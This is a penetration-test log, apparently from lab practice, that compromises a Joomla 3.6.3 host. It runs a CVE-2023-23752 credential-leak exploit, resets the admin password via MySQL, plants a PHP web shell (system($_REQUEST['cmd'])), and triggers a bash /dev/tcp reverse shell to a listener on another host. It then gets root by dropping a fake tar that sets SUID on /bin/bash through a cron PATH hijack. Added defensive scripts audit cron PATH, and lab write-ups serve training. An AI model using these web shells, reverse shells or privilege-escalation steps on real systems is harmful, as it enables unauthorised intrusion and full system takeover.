# CMS101
🧪 Pentest Log: 2025-08-28
## Target Information
- Machine Name: CMS101
- IP Address: 10.11.1.178
- Operating System: Linux

```bash
ip=10.11.1.178
```
## 📡 Enumeration
### Port Scanning
#### Command Used

```bash
# full TCP sweep first, then a script/version scan limited to the open ports, then the top 100 UDP ports
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
```
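The port-list pipeline above feeds every line that starts with a digit into the second scan, which also picks up `filtered` and `closed` entries when nmap prints them. The helper below is an added example, not a command from the original log: it does the same job but keeps only ports in state `open`. The nmap output it parses is constructed for the demo, not captured from CMS101.

```shell
#!/bin/sh
# Added example (not from the original log): turn nmap's normal output into the
# comma-separated list that "-p" expects, keeping only ports whose state is "open"
# so that filtered/closed entries never reach the -sC -sV follow-up scan.
# SAMPLE_NMAP_OUTPUT is constructed for this demo.
SAMPLE_NMAP_OUTPUT='Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.11.1.178
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3306/tcp open     mysql
8080/tcp filtered http-proxy

Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds'

# open_ports: read nmap normal output on stdin, print e.g. "22,80,3306" (no trailing comma)
open_ports() {
    grep -E '^[0-9]+/(tcp|udp)[[:space:]]+open' \
        | cut -d '/' -f 1 \
        | paste -sd ',' -
}

# Stand-alone usage: the value you would pass as "-p$ports"
printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | open_ports
```

On a live host you would replace the sample with `nmap -p- --min-rate=1000 -T4 $ip | open_ports`; the function reads from stdin, so it drops straight into the existing `ports=$(...)` assignment.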
#### Port 22
#### Port 80
### Web Content Enumeration

```bash
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
```

Finding: Joomla 3.6.3 Test Site.

Googled "joomla exploit" and found:
https://github.com/Acceis/exploit-CVE-2023-23752.git
#### Port 3306
## 💣 Exploitation
### Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: Credential Leak
### Exploit Execution
#### 🔧 Exploit Method
Tool / Script Used: https://github.com/Acceis/exploit-CVE-2023-23752.git

```bash
ruby exploit.rb http://$ip
```
Output:

```text
Users
[913] John Doe (joomlaadmin) - joomlaadmin@localhost.local - Super Users

Site info
Site name: Joomla Test Site
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysql
DB host: localhost
DB user: joomla
DB password: PasSw0RdjO0ml4
DB name: joomla
DB prefix: eqa2g_
DB encryption 0
```
Log in to MySQL with `joomla:PasSw0RdjO0ml4` and change the joomlaadmin password:

```sql
use joomla;
UPDATE eqa2g_users SET password='$2y$10$8lRxk7/g1aiqYt2gOKPoMeUGfkuXSzDYPKpmDMR8NGJVV1fJhcJAG' WHERE username='joomlaadmin';
```
Log in to the joomlaadmin account, edit the template and add a shell.php page:

```php
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
```

Trigger a reverse shell through it:

```
http://10.11.1.178/templates/cassiopeia/shell.php?cmd=%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.1.1%2F80%200%3E%261
```

Listener:

```bash
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
```
## 🧬 Privilege Escalation
### 👤 Current Access
- User: apache
- Groups: 48(apache)
- Shell Type: reverse shell
### Enumeration
Scheduled tasks:

```bash
cat /etc/crontab
```

Found:

```text
SHELL=/bin/bash
PATH=.:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /usr/local/bin/backup.sh
```

Note the leading `.` in PATH: any command a cron job runs without an absolute path is looked up in the job's working directory before the system directories.

```bash
cat /usr/local/bin/backup.sh
```

```bash
#!/bin/bash
cd /var/www/html/administrator
tar cf /var/backups/backuplogs.tgz logs
```
### Privilege Escalation Exploit
#### Exploit Summary
- Technique Used: PATH hijack
- Target Binary/Service: tar
- Reference / Source: N/A
#### Exploit Steps
- Setup: place a fake `tar` in the directory the cron job `cd`s into, which `.` in PATH resolves before /bin/tar

```bash
cd /var/www/html/administrator
vi tar
```

Contents of `tar`:

```bash
#! /bin/bash
chmod +s /bin/bash
```

```bash
chmod +x tar
```

- Smash to root (after the next cron run, at most 5 minutes later)

```bash
bash -p
```
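The root cause here is the crontab's PATH, not tar. The script below is an added example, not part of the original log: it audits a crontab for PATH values that contain `.` or an empty entry (a leading or trailing `:` or `::`, which the shell also treats as the current directory), and lists the commands in a job script that are not given by absolute path. It runs the checks over constructed copies of the files found above and over hardened versions of them; none of the files are the real ones from CMS101.

```shell
#!/bin/sh
# Added example (not from the original log): audit a crontab and the job scripts it
# runs for the relative-lookup weakness used above. A cron PATH containing "." or an
# empty entry makes every command that is not an absolute path resolve against the
# job's working directory first. All files below are constructed in a temp dir.

# path_is_unsafe VALUE -> exit 0 if VALUE contains "." or an empty entry
path_is_unsafe() {
    printf '%s\n' "$1" | tr ':' '\n' | grep -qE '^\.?$'
}

# crontab_path_findings FILE -> print every unsafe PATH= line in a crontab file
crontab_path_findings() {
    grep -E '^[[:space:]]*PATH=' "$1" | while IFS= read -r line; do
        value=${line#*=}
        value=${value#\"}; value=${value%\"}   # tolerate PATH="..."
        if path_is_unsafe "$value"; then
            printf 'UNSAFE PATH in %s: %s\n' "$1" "$line"
        fi
    done
}

# unqualified_commands FILE -> command words in a shell script that are not absolute
# paths (shell builtins and variable assignments never go through PATH, so a few
# common builtins are skipped)
unqualified_commands() {
    grep -vE '^[[:space:]]*(#|$)' "$1" \
        | awk '{ c = $1
                 if (c ~ /^\//) next
                 if (c ~ /^[A-Za-z_][A-Za-z0-9_]*=/) next
                 if (c ~ /^(cd|export|exit|echo|set|umask|trap)$/) next
                 print c }' \
        | sort -u
}

# --- demo -----------------------------------------------------------------
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT

# constructed copies of what was found on the box
cat > "$DEMO/crontab.bad" <<'EOF'
SHELL=/bin/bash
PATH=.:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
*/5 * * * * root /usr/local/bin/backup.sh
EOF
cat > "$DEMO/backup.bad.sh" <<'EOF'
#!/bin/bash
cd /var/www/html/administrator
tar cf /var/backups/backuplogs.tgz logs
EOF

# hardened versions: no "." in PATH, and the archiver called by absolute path
cat > "$DEMO/crontab.good" <<'EOF'
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
*/5 * * * * root /usr/local/bin/backup.sh
EOF
cat > "$DEMO/backup.good.sh" <<'EOF'
#!/bin/bash
cd /var/www/html/administrator
/bin/tar cf /var/backups/backuplogs.tgz logs
EOF

for f in crontab.bad crontab.good; do crontab_path_findings "$DEMO/$f"; done
for f in backup.bad.sh backup.good.sh; do
    printf '%s: unqualified commands: %s\n' "$f" "$(unqualified_commands "$DEMO/$f" | paste -sd ' ' -)"
done
```

Either fix on its own closes this particular hole (a sane PATH, or `/bin/tar` in the script); applying both is cheap. The same audit applies to `/etc/cron.d/*` and per-user crontabs, and a job whose working directory is writable by a low-privilege account is worth a second look even when PATH is clean.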
- Key File

```text
bjtp6y5fv6derm7t3e2j
```